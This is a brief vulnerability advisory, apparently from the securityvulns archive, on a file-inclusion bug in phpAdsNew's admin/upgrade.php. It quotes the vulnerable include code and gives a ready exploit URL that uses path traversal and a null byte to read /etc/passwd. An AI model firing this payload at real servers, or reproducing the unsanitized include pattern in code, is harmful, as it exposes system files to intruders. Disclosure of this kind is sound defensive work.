phpAdsNew include bug!

2006-10-19T00:00:00
ID SECURITYVULNS:DOC:14737
Type securityvulns
Reporter Securityvulns
Modified 2006-10-19T00:00:00

Description

Autors: - Michał `wacky` Błaszczak - Nobody

http://iHACK.pl

File: modules/phpads/admin/upgrade.php

Code:

// Load language strings if (file_exists("../language/".$phpAds_config['language']."/default.lang.ph p")) include("../language/".$phpAds_config['language']."/default.lang.php"); else { $phpAds_config['language'] = 'english'; include("../language/english/default.lang.php"); }

Exploit:

http://ihack.pl/phpAdsNew-2.0.8/admin/ upgrade.php?phpAds_config[language]=../../../etc/passwd%00